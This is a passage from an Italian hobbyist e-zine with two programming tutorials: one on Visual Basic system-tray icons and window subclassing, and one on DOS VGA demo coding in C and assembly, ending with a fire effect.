eheh. No. Perche' nulla del programma si vede se non l'icona nella tray. Ecco
qui che entra la seconda parte del nostro lavoro, cioe' fare in modo che
l'icona reagisca ad operazioni su di lei agite. Ad esempio molto bello
sarebbe fare in modo che al doppio click il programma ritornasse. Ecco, per
fare questo ed altro entra in campo il NIM_MODIFY che avevamo visto prima ma
che non avevamo utilizzato. Questa parte potrebbe sembrare difficile, ma in
realta', come prima, se facciamo tutto passo passo non dovrebbe presentare
problemi.

........................
6.1.1 L'ultima frontiera
========================
Ecco qui, nuovo capitolo, nuovo programma. Cerchiamo di vedere bene come
realizzare il Subclassing (voglio far notare che questo e' Subclassing).
Per prima cosa c'e' il prototipo della funzione WindowProc:

listato 9
---------------------------------------
[Public] [Private] Function WindowProc(ByVal hWnd As Long,
ByVal uMsg As Long,_
ByVal wParam As Long, ByVal lParam As Long) As Long
---------------------------------------

I dati di questa funzione sono esattamente quelli del messaggio e vi rimando
quindi al capitolo 2.1.1 (| La struttura del messaggio |) in cui si illustrano
le varie proprieta' della funzione in esame.

Successivamente per specificare al sistema la Window Procedure da utilizzare
ci si serve dell'API SetWindowLong il cui prototipo e' illustrato sotto:

listato 10
---------------------------------------
[Public] [Private] Declare Function SetWindowLong Lib "user32"
Alias "SetWindowLongA" _
(ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
---------------------------------------

I parametri di questa funzione sono ivece i seguenti:

hWnd --------> Che rompimento, ormai questo lo conoscete come casa vostra.
nIndex ------> Il tipo di informazione richiesta (ai fini Subclassistici
(l'ho inventata io questa?:) a noi interessera' maggiormente
la GWL_WNDPROC=-4). Tanto per curiosita' eccoli tutti:

tabella 3
----------------------------------------------------
|Identificatore |Utilizzo |
----------------------------------------------------
|GWL_EXSTYLE |Imposta un nuovo stile esteso del-|
| |la finestra. |
----------------------------------------------------
|GWL_STYLE |Imposta un nuovo stile della fi - |
| |nestra. |
----------------------------------------------------
|GWL_WNDPROC |Imposta un nuovo indirizzo della |
| |Window Procedure. |
----------------------------------------------------
|GWL_HINSTANCE |Imposta un nuovo handle dell'i- |
| |stanza dell'applicazione. |
----------------------------------------------------
|GWL_ID |Imposta un nuovo identificatore |
| |della finestra. |
----------------------------------------------------
|GWL_USERDATA |Imposta il valore a 32bit user- |
| |defined. |
----------------------------------------------------

dwNewLong --->Passa il nuovo valore (Address WindowProc).
OK. Ora vediamo un'altra (eh si, un'altra) funzione da dicharare, ossia la
CallWindowProc, ecco il prototipo:

listato 11
----------------------------------------------------
[Public] [Private] Declare Function CallWindowProc Lib "user32"
Alias "CallWindowProcA" _
(ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, _
ByVal wParam As Long, ByVal lParam As Long) As Long
----------------------------------------------------

A leggerle sono tutte un casino, ma poi alla fin fine sono solo da fare copia
incolla eheheh, ma che divertimento c'e' se non le capite? Ed ora vediamo
come siamo messi con le proprieta':
lpPrevWndFunc --------->Puntatore della procedura.
hWnd ------------------> No comment!
Msg -------------------> Come uMsg (identificatore del messaggio).
wParam, lParam --------> Nfo aggiuntive.

Questa funzione serve per passare il messaggio da uMsg alla finestra di
Subclass il cui handle e' il nostro amico hWnd (tanto per cambiare).

Ora il piu' e' fatto, ora dobbiamo solo impostare la diramazione dei casi
con Select Case. I casi piu' importanti sono:

ON_WM_LBUTTONDBLCLK( )
ON_WM_LBUTTONDOWN( )
ON_WM_LBUTTONUP( )
ON_WM_MBUTTONDBLCLK( )
ON_WM_MBUTTONDOWN( )
ON_WM_MBUTTONUP( )
ON_WM_MDIACTIVATE( )
ON_WM_MEASUREITEM( )
ON_WM_MENUCHAR( )
ON_WM_MENUSELECT( )
ON_WM_MOUSEACTIVATE( )
ON_WM_MOUSEMOVE( )
ON_WM_MOUSEWHEEL( )
ON_WM_MOVE( )
ON_WM_MOVING( )

OK. Ora dovreste essere pronti per la botta di esempi. Ora sapete tutto e
possiamo passare al vero programma iniziando dalla parte di dirama

  
zione per
poi fare un intero programma funzionante:

listato 12
---------------------------------------
Public Function IntercettaMsg(ByVal hwnd As Long, ByVal MSG As Long, ByVal
wParam As Long, ByVal lParam As Long) As Long
If MSG = MYTRAY_MESSAGE Then
Select Case lParam
Case WM_LBUTTONUP:
fai.qualcosa
'Mostra il menu impostato. Questo pero' e' piuttosto rilevante e 'lo vedremo
nel capitolo successivo.
Call Form1.MostraMenu
Case WM_RBUTTONUP:
fai.qualcosa
Case WM_LBUTTONDBLCLK:
fai.qualcosa
Case WM_RBUTTONDBLCLK:
fai.qualcosa
Case Else:
fai.qualcosa
End Select
End If
IntercettaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

............
7.1.1 I menu
============
Altra cosa molto importante a questo punto sono i menu. Quasi tutte le
applicazioni che hanno la possibilita' di far apparire un'icona sulla tray
possiedono una tendina di menu che appare alla pressione di un determinato
tasto. Ora dobbiamo anche capire come funziona questa tendina. La cosa e'
estremamente semplice e di facile comprensione e non prevede che una righetta
di codice (che avete visto esemplificata nel listato 12). Come funziona? La
tendina che appare viene presa da quella di un form che puo' essere visibile
sia sul form che sulla tendina che solo sulla tendina. Quindi prima
programmate tutte le voci della tendina sul form come se fossero la barra
quella con le voci File, Modifica ecc... e poi richiamate la parte che vi
interessa. Ora vediamo di analizzare la questione piu' da vicino:

listato 13
---------------------------------------
Call Form1.MostraMenu
---------------------------------------

Tutto qua. Mi pento anche di averlo numerato come listato :) Intanto vediamo
subito dal principio:

Call --------> Non necessita commenti direi diciamo che esegue.
Form1 -------> Questa parte indica da dove si devono prendere i dati per la
tendina.
MostraMenu --> Questo e' il nome della tendina che viene assegnato nell'editor
dei menu. Quindi se volete che si vede ovunque, spuntato
Visible, altrimenti no e si vedra' solo sulla tendina
dell'icona.

Ora non vi resta altro da fare che provare.

................
8.1.1 Gli esempi
================
OKOKOKOK. Molto bene. Ora non dovete fare altro che mettere tutto insieme e
fare un po' di pratica per escogitare anche dei metodi per velocizzare il
tutto. Non vi preoccupate per ora anche se non avete capito perche' ora c'e'
ancora da leggere ed avete ancora tempo per capire. Ora cominciamo con gli
esempi. Per prima cosa faccio un esempio nuovamente spiegato pari pari a
tutto cio' che vi ho detto fin'ora senza cambiare neanche una virgola e
riportandovi di fianco i capitoli da rivedere per la spiegazione della
funzione o cmq del punto. Spero in questo modo di semplificarvi al massimo la
lettura e lo studio.
Ora iniziamo col primo.

..................
8.2.1 - 1ø Esempio
==================
Questo programma ha un'icona sulla tray (quella del Form1) che viene caricata
al momento del load del form, poi un tasto "nonsochenomedargli" per la sua
rimozione e poi imposteremo l'icona nella tray in modo che alla pressione di
un doppio click del tasto sinistro (anche qui potete modificare l'evento come
volete, il mio e' solo un esempio) appaia un MsgBox con scritto dentro
qualcosa. Nulla di particolare, la semplicita' piu' assoluta.

Il programma comprende quindi due elementi, il primo un Form Form1 con un solo
tasto di nome nonsochenomedargli ed un modulo, piu' semplice non penso di
essere in grado di farvelo, se non tagliando qualche riga che pero' rende
estremamente piu' chiaro il tutto. Vorrei precisare che voi nel modulo
potreste inserire tutto cio' che puo' servire per il Subclassing in modo da
poterlo utilizzare anche in altri programmi semplicemente importandolo anche
se magari c'e' una parte di codice ridondante per ogni programma. Magari poi
ne faccio uno:

Modulo1: listato 14
---------------------------------------
Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA"
(ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal MSG As Long,
ByVal wParam As Long, ByVal lParam As Long) As Long

'Capitolo 6.1.1 L'ultima Frontiera.

Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA"
(ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

'Capitolo 6.1.1 L'ultima Frontiera.

Public Declare Function Shell_NotifyIcon Lib "shell32.dll"
Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long

'Questo fa parte dell'inserimento dell'icona e non del
'Subclassing Capitolo 3.2.1 - La Shell_NotifyIcon.
Public Const GWL_WNDPROC = (-4&)
'Di questo ne abbiamo parlato nel capitolo riguardante il
'subclassing Capitolo 6.1.1 L'ultima Frontiera.
Public Const NIM_ADD = &H0&
'Questi sono i soliti codici che servono per riconoscere le 'varie azioni,
Public Const NIM_DELETE = &H2&
'potete utilizzare questi oppure anche senza dichiararli usando
'solo la stringa.
Public Const NIF_MESSAGE = &H1&
'Questa e' l'unica parte che si puo' tagliare, ma mi sembrava poco 'chiaro.
Public Const NIF_ICON = &H2&
Public Const WM_LBUTTONDBLCLK = &H203&
Public Const MYTRAY_MESSAGE = &H501&
'Questo ve lo faccio notare nuovamente, ma dopo ne parleremo
'meglio.

Public Type NOTIFYICONDATA
'Anche questo lo abbiamo gia' studiato nel capitolo 3.3.1 - La
'struttura di NOTIFYICONDATA
cbSize As Long
hwnd As Long
uID As Long
uFlags As Long
uCallbackMessage As Long
hIcon As Long
szTip As String * 64
End Type

Public hPrecedente As Long
'Dichiara semplicemente una variabile che vedremo usata in
'seguito.
'Tutto quello che segue e' parte del capitolo 6.1.1 L'ultima
'frontiera, solo leggermente tagliato.
Public Function IntercettaMsg(ByVal hwnd As Long, ByVal MSG As Long,
ByVal wParam As Long, ByVal lParam As Long) As Long
If MSG = MYTRAY_MESSAGE Then
Select Case lParam
'Qui per semplcita' ho inserito una sola diramazione, ma potete
'inserirne quante vi pare.
Case WM_LBUTTONDBLCLK:
'non fa alcuna differenza, poi anche l'evento generato e' solo
'per rendere semplice il tutto, potete fare qualsiasi cosa.
MsgBox "qualcosa :)"
End Select
End If
IntercettaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

Ah, eccoci di nuovo fuori dalla finestra del codice. Bellino e'?
Ora rientriamo per vedere il Form1:

Form1: lstato 15
---------------------------------------
'Ancora parte della struttura NOTIFYICONDATA
Dim unavariabileacaso As NOTIFYICONDATA

'Qui sotto ho fatto in modo che al caricamento del form venisse
'dichiarata tutta la struttura NOTIFYICONDATA che avreste potuto
'mettere altrove. La parte che fa apparire l'icona
'effettivamente e' Call Shell_NotifyIcon(NIM_ADD,
'unavariabileacaso), e quella l'avremmo anche potuta separare e
'mettere al click di un tasto.
Private Sub Form_Load()
unavariabileacaso.cbSize = Len(unavariabileacaso)
unavariabileacaso.hIcon = Form1.Icon
unavariabileacaso.hwnd = Form1.hwnd
unavariabileacaso.szTip = "La mia icona nella TaskBar!" & vbNullChar
unavariabileacaso.uCallbackMessage = MYTRAY_MESSAGE
unavariabileacaso.uFlags = NIF_MESSAGE + NIF_ICON + NIF_TIP
unavariabileacaso.uID = 1
'Questa parte e' importante e soprattutto quella con AddressOf,
'ma la vedremo in un altro capitolo.
hPrecedente = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf IntercettaMsg)
'Ecco la chiamata di cui vi ho parlato sul commento sopra.
Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso)
End Sub

Private Sub nonsochenomedargli_Click()
Call SetWindowLong(hwnd, GWL_WNDPROC, hPrecedente)
'e qui come vi accennavo sopra ho staccato la Call dal resto,
'che basta una volta; l'unico cambiamento e' NIM_DELETE.
Call Shell_NotifyIcon(NIM_DELETE, unavariabileacaso)
End Sub
---------------------------------------

Uff. Che fatica. Ora e' OK anche questo. Spero che il tutto ora vi sia piu'
familiare, ma cmq abbiamo ancora esempi da vedere insieme ed avete ancora
tempo di impratichirvi con questo Subclassing. Ora vediamo di inserire
qualcos'altro di interessante. Vediamo quello che piu' volte vi ho accennato
del MYTRAY_MESSAGE. Questo MYTRAY_MESSAGE e' una costante dichiarata nell'area
delle dichiarazioni che assume il valore dell'uCallbackMessage. Quindi e'
diciamo il messaggio di ritorno dall'icona sulla tray.

........................................
8.2.2 - Perche' l'utilizzo di AddressOf?
========================================

Allora e' una cosa piuttosto complicata, ma diciamo che serve per impostare il
terzo parametro (dwNewLong) nel momento in cui io inveco la funzione SetWindow
Long. Alla funzione AddressOf si fa seguireil nome della nostra nuova Windows
Procedure che deve essere prima dichiarata come Public nel modulo.

Praticamente con AddressOf noi invochiamo quella function che avevamo scritto
precedentemente e la incastriamo tra i tr parametri della SetWindowLong.

..................
8.3.1 - 2ø Esempio
==================
Ora ci vediamo questo secondo esempio, chiaramente se ancora non avete capito
la parte precedente vi consiglio vivamente di rivedervela perche' altrimenti
la comprensione in questa sara' ancora piu' difficile.
Se invece, come penso, avete capito il resto per bene, ora inizierete a
trovare la cosa molto piu' ragionevole in termini di tempo.
Ora, nella creazione di programmi io consiglio di utilizzare delle routine del
genere:

listato 16
---------------------------------------
Sub Iconizza(A As PictureBox, Ms As String)
NI.cbSize = Len(NI)
NI.HWnd = A.HWnd
NI.uID = 0
NI.uID = NI.uID + 1
NI.uFlags = NIF_MESSAGE Or NIF_ICON Or NIF_TIP
NI.uCallbackMessage = WM_MOUSEMOVE
NI.hIcon = A.Picture
NI.szTip = Ms + Chr(0)
Call Shell_NotifyIcon(NIM_ADD, NI)
End Sub
---------------------------------------

Questa volta ho evitato di inserire commenti per rendere piu' visibile il
listato che per la sua dimensione molto ridotta e' di semoplice comprensione.
Cosa ho fatto? Ho inserito il solito codice che conoscete bene per la
struttura NOTIFYICONDATA.
Pero' ho fatto una cosa piuttosto intelligente (cosa strana per me), ho fatto
in modo che con questa Sub venisse fuori un "comando" dalla sintassi:

listato 17
---------------------------------------
Iconizza [nomeiconadellapicturebox], [Tooltippericona]
---------------------------------------
Capito? In questo modo la cosa diventa molto utile soprattutto quande ci si
trova a dover cambiare spesso icona e Tooltip in relazione a diversi eventi e
diverse situazioni. Tutto chiaro? Non e' stato aggiunto nulla alla fin fine
che voi gia' non conosceste, ma abbiamo solo utilizzato le variabili in modo
intelligente.

..................
8.4.1 - 3ø Esempio
==================
Sulla scia di questo non e' difficile intuire che sempre per velocizzare la
scrittura del programma si potrebbe anche fare una cosa di questo tipo:

listato 18
---------------------------------------
Sub TrucidaIcona()
Call Shell_NotifyIcon(NIM_DELETE, NI)
End Sub
---------------------------------------

tanto per non dover scrivere ogni volta tutta questa roba:

listato 19
---------------------------------------
Call Shell_NotifyIcon(NIM_DELETE, NI)
---------------------------------------

eheheh. Semplicissimo anche questo. Solo qualche piccolo trucchetto.

...............................
9.1.1 Manteniamo la promessa :)
===============================
OK. Precedentemente vi avevo detto che vi avrei costruito un piccolo modulo
che contenesse tutto cio' che potesse servire per eseguire il Subclassing;
ebbene, eccolo qui:

modulo1: listato 20
---------------------------------------
' Piccolo modulo per
' la gestione di una
' icona nella tray
' Created by R a m s e s

Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA"
(ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal MSG As Long,
ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA"
(ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA"
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long,
ByVal lParam As Long) As Long

Public Const GWL_WNDPROC = (-4&)

Dim A As NOTIFYICONDATA

Public Const NIM_ADD = &H0&
Public Const NIM_MODIFY = &H1&
Public Const NIM_DELETE = &H2&
Public Const NIF_MESSAGE = &H1&
Public Const NIF_ICON = &H2&
Public Const NIF_TIP = &H4&

Public Const WM_MOUSEMOVE = &H200&
Public Const WM_LBUTTONDOWN = &H201&
Public Const WM_LBUTTONUP = &H202&
Public Const WM_LBUTTONDBLCLK = &H203&
Public Const WM_RBUTTONDOWN = &H204&
Public Const WM_RBUTTONUP = &H205&
Public Const WM_RBUTTONDBLCLK = &H206&

Public Declare Function Shell_NotifyIcon Lib "shell32.dll"
Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long

Public Type NOTIFYICONDATA
cbSize As Long
hwnd As Long
uID As Long
uFlags As Long
uCallbackMessage As Long
hIcon As Long
szTip As String * 64
End Type

Public Const MYTRAY_MESSAGE = &H501&
Public hPrecedente As Long

'Questo vi ho spiegato come usarlo
Sub TrucidaIcona()
Call Shell_NotifyIcon(NIM_DELETE, NI)
End Sub

'Anche questo ve l'ho spiegato
Sub Iconizza(A As PictureBox, Ms As String)
NI.cbSize = Len(NI)
NI.hwnd = A.hwnd
NI.uID = 0
NI.uID = NI.uID + 1
NI.uFlags = NIF_MESSAGE Or NIF_ICON Or NIF_TIP
NI.uCallbackMessage = WM_MOUSEMOVE
NI.hIcon = A.Picture
NI.szTip = Ms + Chr(0)
Call Shell_NotifyIcon(NIM_ADD, NI)
End Sub

Public Function BeccaMsg(ByVal hwnd As Long, ByVal MSG As Long,
ByVal wParam As Long, ByVal lParam As Long) As Long
If MSG = MYTRAY_MESSAGE Then
Select Case lParam
Case WM_LBUTTONUP:
Case WM_RBUTTONUP:
Case WM_LBUTTONDBLCLK:
Case WM_RBUTTONDBLCLK:
Case Else:
End Select
End If
BeccaMsg = CallWindowProc(hPrecedente, hwnd, MSG, wParam, lParam)
End Function
---------------------------------------

OK. Anche questa e' fatta. Ora penso che su questo argomento ne sappiate quasi
piu' di me eheheh.
Ora se non vi e' tutto molto chiaro rileggete e stato un poco a fare
esperimenti col testo davanti e vedrete che capirete e riuscirete a fare.
Se volete un consiglio prima di usare il mio modulo che e' un "canned tools"
(strumenti impacchattati) perche' vi arriva tutto gia' pronto e non dovete
fare nessuna fatica, vi consiglio di fare da soli.
Poi usatelo senza problemi perche' e' quasi come se ve lo foste fatto voi.
Poi, una volta che tutto cio' vi diventa familiare e normale nell'utilizzo
vedrete che anche voi riuscirete a "migliorarvi la vita". Bene, anche questo
giorno e' finito, vi chiedo scusa per eventuali errori di scrittura e se i
miei listati non siano sempre chiari, anche a causa del fatto che io li ho
fatti prima col VB per testarli, quindi cambiando formato ci sono stati
problemi. Se aveste problemi con tutto cio' potete contattarmi senza alcun
problema, sono a vostra disposizione (e non pensate che sia un mago neanche
io).

........................
10.1.1 How to Contact me
========================
http://evilzone.tsx.org
ICQ: 39860665
mail: ram5e5@freemail.it

---R A M S E S---

------------------------------------------------------------[ dEmo-cOdInG ]---
===] PICCOLI DEMO CON IL PC ]=================================================
-----[ Orka4n ]---------------------------------------------------------------

Premessa:
Ciao a tutti quanti.
Io sono Orka4n, non sono un hacker, neanche un demo coder mi piacerbbe esserli
,
ma per adesso posso definirmi solo uno smanettone.
le informazioni che troverete in questo articolo sono puramente a scopo
didattico, comunque poichè parleremo di "demo" e non di hacking, ecc. potete
benissimo utilizzarle, anche se io non mi prendo nessuna responsibilità.

Questo è il mio primo articolo (sempre se si possa chiamarlo tale) mi scuso
con tutti quelli che leggeranno (quanti siete?) perchè il mio italiano fa
pena e non ci posso fare niente.

Inizio:
Volevo discutere di un argomento abbastanza affascinante; la grafica con il
computer (come fare dei demo, dei "videogiochi" tanto per intenderci )

Molti di voi avranno visto una demo grafica e credo che tutti
abbiano giocato con un video game. Vi siete mai chiesti come si faccia un
gioco o una demo?

Se sapete già tutto potete anche non leggere questo brandello di bit, se no
fate quello che volete.

una demo semplice richiede:
1) La conoscenza di un linguaggio di pgm tipo C o pascal
2) un idea originale

un demo complesso (3d con texture ecc, tanto per intenderci) richiede:
1) la conoscenza dell'assembly (non sempre obbligatoria)
2) nozioni di geometria
3) un'idea originale, che ci vuole sempre

Noi parleremo di demo sempilci, di come si possa dire al pc di impostare la
grafica, disegnare qualcosa a video e poi come fare qualche effetto come
il plasma o il fuoco.

Iniziamo:
Se non avete la conoscenza del c o di un minimo di assembly , cosa sono i
registri e cosa sono gli int ... sarà un pò dura, però se vedrò che
l'argomento vi ha interessato deciderò se fare o no qualcosa alla portata di
TUTTI.

come si fa a disegnare col pc?

bisogna dire al computer vai alla cordinata x, y dello schermo e accendi quel
puntino, pixel, con il colore che vogliamo (elementare no?)

Bene ora passiamo alla realizzazione pratica:

Premetto tutto il codice da me scritto è stato compilato usando il
compilatore
della borland il c++ versione 3.0 percui forse c'è qualcosa che bisogna
aggiustare in caso non abbiate il su detto compilatore.

/*impostazione della modalità grafica, all'inizio siamo in modalità testo e
possiamo solo visualizzare caratteri e non disegnare! */


void set_vga() {
asm mov ax,13h //imposta modalità 320(x) x 200(y) (256 colori)
asm int 10h //questo è inline assembly permesso dal c
}

ma ora che abbiamo settato la modalità grafica cosa facciamo ?
proviamo a disegnare un pixel a video. Per fare questo esistono 3 modi:

1) modo + lento si richiama un int (una subroutine del bios)
int 10h
registri AH 0Ch
AL colore
CX x (0-319)
DX y (0-199)
BH 1 -> pagina (non ci serve, per altre modalità)

registri alterati: AX, SP, BP, SI, DI

void int_put_pixel(int x, int y, unsigned char col){

// cordinate x(0-319), y(0-199)
asm{
mov ah,0Ch
mov al,col
mov cx,x
mov dx,y
mov bx,1
int 10h
}
}

2) modo andiamo direttamente in memoria video che parte dall'indirizzo
0xa000 quindi se noi vogliamo disegnare nella posizione x,y
dobbiamo fare 0xa000 + x + (y*xsize) = colore
nel nostro caso xsize = 320
void mem_put_pixel(int x,int y, unsigned char col){
unsigned char *mem;
mem = (unsigned char *) MK_FP(0xa000 , x+y*320);

//crea un puntatore (serve dos.h)

*mem = col; //disegno nel punto giusto
}


l'operazione di moltiplicazione è lenta percui si può usare
uno stratagemma
y * 320 = y<<6 + y<<8 (operzioni di shift y*256 + y*64 )

quindi mem =(unsigned char *) MK_FP(0xa000 + x + y<<8 + y<<6);

3) modo tutto in assembly il più veloce

void put_pixel(int x,int y,char col){
asm {
mov ax,0xa000
mov es,ax
mov di,x
mov dx,y
xchg dl,dh //dx = y<<8 = y*256
add di,dx //di = x + y<<8 = x + y*256
shr dx,2 //dx = y<<6 = y*64 impostare compilazione 286
add di,dx //di = x + y<<8 + y<<6 = x+ y*320 (256+64)
mov al,col
stosb //stosb = mov es:[di],al
}
}

vi chiederete perchè vi ho proposto 3 funzioni che fanno la stessa cosa,
la risposta è semplice, volevo farvi capire che per programmare una demo, o
un gioco, bisogna sfruttare al massimo la macchina (pc) che si usa perchè,
più veloce è un routine, più cose possimao fare.

Chiusa questa piccola nota vediamo cosa si può fare con la sola funzione
put_pixel.

1 disegnare una linea orrizontale o verticale, con un pò di geometria anche
una linea generica
2 fare dei rettangoli pieni o vuoti
3 disegnare dei cerchi (usando seno e coseno)
4 ...

(lascio a voi implementare i 3 punti, se vi interessa chiedetemi)
( l' 1 e il 2 sarebbe meglio farli direttamente in asm)

Nota(quante ne faccio di ste note):

Ci sarebbero ancora tante funzioni che si dovrebbereo sviluppare, ma non
posso mica scrivere un libro vi consiglio di provare e provare e caso mai
chiedetemi

----> ora si comincia con il divertimento facciamo il fuoco o meglio un
fuocherello.

Premessa:

L'effetto grafico del fuoco è stato sviluppato e modificato da tanttismi
demo coder e non, percui se trovate in giro un demo molto simile al mio,
sappiate che io non sono l'inventore dell'effetto del fuoco e che ho dovuto
dodumentarmi su come si possa fare questo effetto (ci sono decine di tut
sull'argomento). Quindi non venite a dirmi che ho copiato o cazzate del
genere, perchè è come dire a un pasticcere che quando fa una torta, magari
alle mele, che ha copiato visto che non è di sua invenzione.

Finita questa precisazione così lunga, ma neccessaria, possiamo veramente
iniziare...

Di cosa abbiamo bisogno?

1° abbaimo bisogno di un bel set di colori e come fare?
esiste la possibilità di impostare i nostri 256 colori che non sono altro
che valori RGB (rosso verde blu)
ma ecco subito la funzione:

set_color(unsigned char ncol,unsigned char r,unsigned char g,unsigned char b)
{
outportb(0x3c8,ncol); // porta 0x3c8 numero colore [0..255]
outportb(0x3c9,r); // porta 0x3c9 valore rosso [0..63]
outportb(0x3c9,g); // porta 0x3c9 valore verde [0..63]
outportb(0x3c9,b); // porta 0x3c9 valore blu [0..63]
}

info funziona anche in modalità testo, provate a mettere
set_color(7,0,63,0);
e avrete al posto del grigio r=42 g=42 b=42 un bel verde come nel film matrix
se poi fate anche

set_dimensione(int dim){ // 1..4 (prova con il 2 )

funziona in modalità testo
asm{ mov ax,0x1110
add ax,dim
mov bl,0
int 10h
}
}

L'effetto è ancora + bello (non vi piacciono le scritte così? )

Finita la breve info ecco i colori che deve avere un fuoco

Il fuoco partendo dall'alto va: dal nero al rosso al giallo al bianco,
il rosso è il colore dominante percui dovremmo mettere più sfumature di rosso.

Ci creiamo una bella palette che dal [nero r=0 g=0 b=0] arrivi al
[rosso r=63 g=0 b=0] poi dal rosso al [giallo r=63 g=63 b=0] e infine dal
giallo al [bianco r=63 g=63 b=63]

ecco il codice:

imposta_palette(){
//provate a cambiare i valori
int i; //il solito indice
//128 sfumature dal nero al rosso -> colore predominante
for (i=0; i<128;i++)
set_color(i,i/2,0,0);
//64 sfumature dal rosso al giallo
for (i=128; i<192;i++)
set_color(i,63,i-128,0);
//64 sfumature dal giallo al bianco
for (i=192; i<=255;i++)
set_color(i,63,63,i-192);
}

2° come fare il fuoco?
mah, è semplice si prende un pò di benzina e ....
A parte gli scherzi bisogna creare una matrice (N+2)xM elemnti dove
metteremo dei valori random compresi tra [0..255] poi operiamo dei calcoli
su questa matrice cioè facciamo una semplice media e ...(è difficile da
spiegare a parole, guardate il codice)

void imposta_fuoco(){ //inizializza il fuoco
int x,y; //i nostro bei indici
for (y=0; y<N+2; y++) //(N+2) * M (perchè N+2 -> si capisce dopo)
for (x=0; x<M; x++)
fuoco[y][x] = rand() % 256; //valori random [0..255]
}

void vai_fuoco(){ //il cuore dell'effetto
int x,y;
for (x=0; x<M; x++) // M nel nostro caso vale 320
for (y=0; y<N; y++){ // arrivo massimo a N-1 , N + 2 = 202 la matrice è
M*(N+2)

// stiamo testando la colonna 0
if (x == 0)
//calcolo una media con i colori
(lo shift di 2 = dividere per 4, provare per
credere
fuoco[y][x] = (fuoco[y+1][0] + fuoco[y+1][x] +
fuoco[y+1][x+1] + fuoco[y+2][x])>>2;

else
// stiamo testando la colonna M-1 (319)
if (x == M-1)
fuoco[y][x] = (fuoco[y+1][x-1] + fuoco[y+1][x] +
fuoco[y+1][M-1] + fuoco[y+2][x])>>2;
else
// siamo nel mezzo
fuoco[y][x] = (fuoco[y+1][x-1] + fuoco[y+1][x] +
fuoco[y+1][x+1] + fuoco[y+2][x])>>2;

//serve per sfumare alla fine il fuoco verso il nero
//provate a commentare la riga o a cambiare le
costanti che metteremo nel main
if (fuoco[y][x] > max_altezza_fuoco) fuoco[y][x] -= altezza_fuoco;
}
}

Il codice credo che si commenti da solo, abbiamo questa matrice e facciamo una
bella media globale così da sfumare proggressivamente il nostro bel fuoco.

Un suggerimento:

Provate a fare la media con dei punti diversi dipo (x-1,y-1) (x+1,y-1)
(x-1,y+1) (x+1,y+1)

Se pensavate che fosse finita vi siete sbagliati ora bisogna disegnare questo
bel fuoco a video e successivamente annimarlo. Per disegnarlo è facilissimo
ecco qua il codice:

void disegna_fuoco (void){
int x, y;
// Copiamo il contenuto della matrice a video
for (y=0; y<N; y++) //M = 320 e N=200 potete anche variare
for (x=0; x<M; x++) //e magari mettere anche un bel start_x e
start_y
put_pixel (x, y, fuoco[y][x]); //nota non disegno le ultime due righe
//provate a sostituirla con int_put_pixel (che
lento no?)
}

Animiamo il tutto ->

basta rimpostare dei valori random [0..255] nelle ultime 2 righe ecco perchè
non le disegnamo (sarebbero un pò brutte) e perchè abbiamo un matrice con due
righe in più.

void anima_fuoco(){ //fa muovere il fuoco combinata insieme a vai
fuoco
int x; //il solito indice
for (x=0; x<M; x++){ //M=320 e N=200
fuoco[N][x] = rand () % 256; // 200 ecco perchè una matrice di M*(N+2)
fuoco[N+1][x] = rand () % 256; //201
}
}


Abbiamo quasi finito ora basta creare il main, lo so che siete pigri percui
eccolo qui di seguito:

#include<conio.h> //per il kbhit
#include<dos.h> //pel l'MK_FP (make a far pointer)
#include<stdlib.h> //per il random

//variabili globali e costanti:
const int N=200;
const int M=320;
const int max_altezza_fuoco=20; //serve per sapere l'altezza massima del
fuoco
const char altezza_fuoco=1; //per sfumare il fuoco verso il nero

unsigned char fuoco[N+2][M]; //globale

// funzioni:
// qui inserite tutte le funzioni sopra descritte (set_vga, imposta_palette,
imposta_fuoco,
// vai_fuoco, disegna_fuoco, anima_fuoco, set_text e wait_retrace (per queste
2 vedi dopo) )


void main(){
set_vga();
imposta_palette();
imposta_fuoco();
do{
vai_fuoco();
disegna_fuoco();
anima_fuoco();
wait_retrace(); //vedi seguito provate a toglierla
}while(!kbhit());
set_text();
} // FINE.

l'ultima funzione reimposta la modalità testo eccola qua:
void set_text(){
asm mov ax,03h //imposta modalità testo
asm int 10h //notare la somiglianza con set_vga
}

Se tutto funziona un bel fuoco dovrebbe apparire, può darsi che noterete un
piccol flicheraggio, questo è dovuto dal fatto che il monitor impiega un pò
di tempo a fare il refresh, per ovviare questo inconveninte si possono
operere 2 diverse strategie:

-> la prima consiste nel disegnare il fuoco in una zona di memoria diversa
dalla memoria video e poi ricopiare questa zona di memoria a video
(tecnica del double buffer)

-> la seconda consiste nell'aspettare che il monitor facci il refresh
(wait_retrace) e solo dopo disegnare.
Introdurrò questo secondo metdodo anche perchè se no bisognerebbe
modificare la funzione put_pixel per dirgli di disegnare da un'altra parte
(fatelo voi casomai)

ecco il codice:

void wait_retrace(){ //aspetta il refresh del video
asm{ //utile in altri semplici demo
mov dx,3DAh
}
l1:
asm{
in al,dx
and al,08h
jnz l1
}
l2:
asm{
in al,dx
and al,08h
jz l2
}
}

Ora che il fuoco funziona modificatelo scoprite nuove cose, cambiate la
palette insomma usate un pò di fantasia (non vi avevo detto che ci vuole
un'idea originale?).

Note:

Il codice è stato compilato usando il compilatore della borland il c++
versione 3.0 percui forse c'è qualcosa che bisogna aggiustare in caso non
abbiate il suddetto compilatore.

